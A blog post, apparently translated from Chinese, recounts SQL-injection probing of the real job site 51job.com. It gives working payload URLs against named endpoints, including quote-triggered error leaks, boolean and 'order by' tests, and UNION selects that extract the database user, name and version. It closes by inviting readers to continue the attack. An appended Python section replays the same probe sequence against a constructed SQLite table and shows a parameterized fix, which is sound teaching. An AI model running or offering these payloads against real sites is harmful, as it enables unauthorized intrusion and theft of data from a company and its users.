http://hi.baidu.com/tjannock/blog/item/01d0aa2b1f7f0cf9e7cd4020.html
Today there were flyers for http://my.51job.com being handed out at school, so I went and had a look at the site.
Clicked on the voting page and found a PHP SQL injection:
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 '
ORA-00933: SQL command not properly ended
Query :"select * from log_action where type=7001'' and selval!=0 order by selval asc"
Appending a double quote also leaks the script path:
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 "
Warning: OCIParse: ORA-01740: missing double quote in identifier in /var/www/inc/co/news/news_oci8.class.php on line 69
Warning: Supplied argument is not a valid OCI8-Statement resource in /var/www/inc/co/news/news_oci8.class.php on line 92
Unfortunately the privileges aren't high enough, so all I can do is guess table names, the same way as Access injection in ASP.
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 and exists(select * from log_action)
That returns normally. Of course the log_action table named in `and exists(select * from log_action)` exists. Haha.
Let's look at some other pages.
http://my.51job.com/investigate/ShowInvestList.php?typelike=07'
ORA-00933: SQL command not properly ended
Query :"select id,type,subject,forum_id,msg_id,class_id,recommend from log_action where class_id=07'' and selval=0 order by
So it turns out the holes are everywhere... ugh.
-------------------------------------------------------------------------------------------------------------------
New discovery. There really are a lot of vulnerabilities.
The ad link at the bottom of the page:
http://ac.51job.com/phpAD/adtrace.php?ID=10775340
redirects normally,
but
http://ac.51job.com/phpAD/adtrace.php?ID=10775340'
does not redirect normally.
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=1 -> normal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 -> abnormal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 4 -> abnormal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 3 -> normal
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select 1,2,3 returns
http://companyadc.51job.com/1
And with http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select user(),2,3 :
http://companyadc.51job.com/jobs@localhost
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select database(),2,3
http://companyadc.51job.com/jobs
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select version(),2,3
http://companyadc.51job.com/5.0.26-standard-log
Haha....
Anyone interested in guessing further can carry on............ go |
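The probe sequence used above (a stray quote to trigger a parse error that echoes the query, `and 1=1` / `and 1=2` to confirm the condition is evaluated, `order by N` to count result columns, then `union select` to pull `user()`, `database()` and `version()` into the redirect URL) is shown below against a deliberately vulnerable lookup, next to the parameterized version that stops every one of those probes. This is an added example, not code from 51job or from the original post: it runs on an in-memory SQLite table named `ads` with three columns (matching the column count the post infers from `order by 3` vs `order by 4`), the base URL and the ad ID 42 are constructed, and `sqlite_version()` stands in for MySQL's `version()` because SQLite has no `user()` or `database()`.

```python
"""Added example (not the site's code): the ad-tracker injection probes from
the post, replayed against a constructed SQLite table, plus the fix."""
import sqlite3

# Constructed values for the example; nothing here comes from 51job.
BASE_URL = "http://ads.example.com/"
SAMPLE_ADS = [(42, "landing/spring-jobs", 120, 5), (43, "landing/campus", 80, 3)]


def make_db():
    """In-memory table mirroring a three-column ad lookup (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER, path TEXT, clicks INTEGER, weight INTEGER)")
    conn.executemany("INSERT INTO ads VALUES (?,?,?,?)", SAMPLE_ADS)
    return conn


def vulnerable_redirect(conn, raw_id):
    """Intentionally vulnerable: the ID is concatenated straight into SQL text,
    and the database error, query included, is echoed back, just as the
    Oracle 'Query :' messages in the post were."""
    sql = f"SELECT path, clicks, weight FROM ads WHERE id={raw_id}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", f"{exc} in query: {sql}")
    if row is None:
        return ("no_redirect", None)
    # The first selected column becomes the redirect target, which is why a
    # UNION payload can place user()/version() into the URL the client sees.
    return ("redirect", BASE_URL + str(row[0]))


def safe_redirect(conn, raw_id):
    """Fixed version: validate the type, then bind the value as a parameter so
    it can never be parsed as SQL grammar. Errors are not echoed to the client."""
    try:
        ad_id = int(raw_id)
    except ValueError:
        return ("rejected", None)
    row = conn.execute(
        "SELECT path, clicks, weight FROM ads WHERE id=?", (ad_id,)
    ).fetchone()
    if row is None:
        return ("no_redirect", None)
    return ("redirect", BASE_URL + str(row[0]))


def probe(conn, lookup, ad_id="42"):
    """Replay the post's probe sequence through `lookup` and return what an
    attacker observes for each payload."""
    payloads = {
        "quote": ad_id + "'",                      # parse error -> query leaks
        "true": ad_id + " and 1=1",                # same as baseline
        "false": ad_id + " and 1=2",               # row disappears
        "order3": ad_id + " order by 3",           # 3 columns: fine
        "order4": ad_id + " order by 4",           # 4th column: error
        "union_marker": ad_id + " and 1=2 union select 1,2,3",
        # sqlite_version() stands in for MySQL version()
        "union_version": ad_id + " and 1=2 union select sqlite_version(),2,3",
    }
    return {name: lookup(conn, payload) for name, payload in payloads.items()}


if __name__ == "__main__":
    db = make_db()
    for name, result in probe(db, vulnerable_redirect).items():
        print(f"vulnerable {name:14s} -> {result}")
    for name, result in probe(db, safe_redirect).items():
        print(f"safe       {name:14s} -> {result}")
```

The `order by 4` failure is what tells you the SELECT has exactly three columns, so `union select 1,2,3` is the first UNION shape that can succeed; the marker `1` landing in the redirect URL then tells you which column is reflected, and that is the slot to put `user()`, `database()` or `version()` in. With the parameterized lookup every payload is rejected at the `int()` check before a query is ever built, and nothing about the query text or the server path reaches the response.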